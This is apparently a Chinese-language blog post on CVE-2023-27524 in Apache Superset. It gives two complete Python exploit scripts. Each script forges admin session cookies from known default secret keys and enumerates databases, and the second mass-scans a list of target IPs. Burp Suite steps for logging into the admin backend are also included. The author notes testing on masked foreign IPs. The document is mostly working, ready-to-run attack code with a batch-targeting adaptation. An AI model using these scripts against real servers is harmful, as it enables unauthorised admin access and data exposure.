测试资产为国外 IP,存在漏洞的 IP 地址已做打码处理。
我们只进行 poc,请勿进行任何非法入侵和攻击。
一、Apache Superset 简介
二、CVE-2023-27524 漏洞介绍
一、Apache Superset 简介
Apache Superset 是一个开源的现代数据探索和可视化平台
二、CVE-2023-27524 漏洞介绍
Apache Superset 是一种广泛使用的数据可视化和探索开源工具,已被确定存在潜在的安全漏洞,可能导致身份验证绕过和远程代码执行 (RCE),这些漏洞可能使恶意行为者能够获得目标服务器上的管理权限,从而使他们能够收集用户凭据并可能危及数据。
Apache Superset 2.0.1 及之前的版本
Apache Superset
from flask_unsign import session import requests import urllib3 import argparse import re from time import sleep urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) SECRET_KEYS = [ b'x02x01thisismyscretkeyx01x02\e\y\y\h', # version < 1.4.1 b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1 b'thisISaSECRET_1234', # deployment template b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation b'TEST_NON_DEV_SECRET' # docker compose ] def main(): parser = argparse.ArgumentParser() parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True) parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1') parser.add_argument('--validate', '-v', help='Validate login', required=False, action='store_true') parser.add_argument('--timeout', '-t', help='Time to wait before using forged session cookie, default=5s', required=False, type=int, default=5) args = parser.parse_args() try: u = args.url.rstrip('/') + '/login/' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0' } resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False) if resp.status_code != 200: print(f'Error retrieving login page at {u}, status code: {resp.status_code}') return session_cookie = None for c in resp.cookies: if c.name == 'session': session_cookie = c.value break if not session_cookie: print('Error: No session cookie found') return print(f'Got session cookie: {session_cookie}') try: decoded = session.decode(session_cookie) print(f'Decoded session cookie: {decoded}') except: print('Error: Not a Flask session cookie') return match = re.search(r'"version_string": "(.*?)"', resp.text) if match: version = match.group(1) else: version = 'Unknown' print(f'Superset Version: {version}') for i, k in enumerate(SECRET_KEYS): cracked = session.verify(session_cookie, k) if cracked: break if not cracked: print('Failed to crack session cookie') return print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}') try: user_id = int(args.id) except: user_id = args.id forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k) print(f'Forged session cookie for user {user_id}: {forged_cookie}') if args.validate: validated = False try: headers['Cookie'] = f'session={forged_cookie}' print(f'Sleeping {args.timeout} seconds before using forged cookie to account for time drift...') sleep(args.timeout) resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False) if resp.status_code == 302: print(f'Got 302 on login, forged cookie appears to have been accepted') validated = True else: print(f'Got status code {resp.status_code} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.') except Exception as e_inner: print(f'Got error {e_inner} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.') if not validated: return print('Enumerating databases') for i in range(1, 101): database_url_base = args.url.rstrip('/') + '/api/v1/database' try: r = requests.get(f'{database_url_base}/{i}', headers=headers, verify=False, timeout=30, allow_redirects=False) if r.status_code == 200: result = r.json()['result'] # validate response is JSON name = result['database_name'] print(f'Found database {name}') elif r.status_code == 404: print(f'Done enumerating databases') break # no more databases else: print(f'Unexpected error: status code={r.status_code}') break except Exception as e_inner: print(f'Unexpected error: {e_inner}') break except Exception as e: print(f'Unexpected error: {e}') if __name__ == '__main__': main()
在脚本位置打开 cmd,使用 python 命令执行该脚本,使用 -u 参数指定测试的 url
(注意:url 需要加上 http:// 或者对应端口)
针对同一个 URL ,每次执行得到的 cookie 值是不一样、随机的
比如我们现在得到了一个 cookie 值
使用 burpsuite 抓包拦截,将 cookie 添加进去
然后放包,并且关掉 burpsuite 的拦截
查看页面回显,直接进入到 Apache Superset 的管理后台
不要发到重发器,我们直接抓包后修改 cookie 放包即可,这里要的就是302重定向。
使用 -f 参数指定一个 txt 文档,里面为所有的目标 IP
同样 -v 参数可以验证登录,枚举数据库信息
-t 参数指定进入等待时间
每条结果前会显示对应请求的 URL
去掉了原有的 -u 和 --id 参数
自动为扫描结果分配 id
from flask_unsign import session import requests import urllib3 import argparse import re from time import sleep import os urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) SECRET_KEYS = [ b'x02x01thisismyscretkeyx01x02\e\y\y\h', # version < 1.4.1 b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1 b'thisISaSECRET_1234', # deployment template b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentation b'TEST_NON_DEV_SECRET' # docker compose ] def main(): parser = argparse.ArgumentParser() parser.add_argument('--file', '-f', help='包含 IP 列表的文本文件的路径', required=True) parser.add_argument('--validate', '-v', help='验证登录', required=False, action='store_true') parser.add_argument('--timeout', '-t', help='在使用伪造的会话 cookie 之前等待的时间,默认为 5 秒', required=False, type=int, default=5) args = parser.parse_args() try: with open(args.file, 'r') as file: ip_list = file.read().splitlines() for i, ip in enumerate(ip_list, start=1): args.url = f'http://{ip}' process_ip(args, ip, i) print('-' * 150) # 添加的分隔符 except Exception as e: print(f'发生意外错误:{e}') def process_ip(args, ip, user_id): try: u = args.url.rstrip('/') + '/login/' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0' } resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False) if resp.status_code != 200: print(f'在 {u} 处获取登录页面时发生错误,状态码:{resp.status_code}') return session_cookie = None for c in resp.cookies: if c.name == 'session': session_cookie = c.value break if not session_cookie: print(f'对 {ip} 的错误:未找到会话 cookie') return print(f'{u} 获取到会话 cookie:{session_cookie}') try: decoded = session.decode(session_cookie) print(f'{u} 解码后的会话 cookie:{decoded}') except: print(f'{u} 错误:不是 Flask 会话 cookie') return match = re.search(r'"version_string": "(.*?)"', resp.text) if match: version = match.group(1) else: version = '未知' print(f'{u} Superset 版本:{version}') for i, k in enumerate(SECRET_KEYS): cracked = session.verify(session_cookie, k) if cracked: break if not cracked: print(f'{u} 无法破解会话 cookie') return print(f'{u} 对 CVE-2023-27524 漏洞的敏感 - 使用默认的 SECRET_KEY:{k}') forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k) print(f'{u} 为用户 {user_id} 伪造的会话 cookie:{forged_cookie}') if args.validate: validated = False try: headers['Cookie'] = f'session={forged_cookie}' print(f'{u} 在使用伪造的 cookie 之前等待 {args.timeout} 秒以考虑时间漂移...') sleep(args.timeout) resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False) if resp.status_code == 302: print(f'{u} 在登录时得到 302,伪造的 cookie 似乎已被接受') validated = True else: print(f'{u} 在登录时得到状态码 {resp.status_code},而不是预期的重定向 302。伪造的 cookie 似乎无效。请重新检查用户 ID。') except Exception as e_inner: print(f'{u} 在登录时发生错误 {e_inner},而不是预期的重定向 302。伪造的 cookie 似乎无效。请重新检查用户 ID。') if not validated: return print(f'{u} 正在枚举数据库') for i in range(1, 101): database_url_base = args.url.rstrip('/') + f'/api/v1/database' try: r = requests.get(f'{database_url_base}/{i}', headers=headers, verify=False, timeout=30, allow_redirects=False) if r.status_code == 200: result = r.json()['result'] # 验证响应是否为 JSON name = result['database_name'] print(f'{u} 找到数据库 {name}') elif r.status_code == 404: print(f'{u} 完成枚举数据库') break # 没有更多的数据库 else: print(f'{u} 意外错误:状态码={r.status_code}') break except Exception as e_inner: print(f'{u} 意外错误:{e_inner}') break except Exception as e: print(f'{u} 意外错误:{e}') if __name__ == '__main__': main()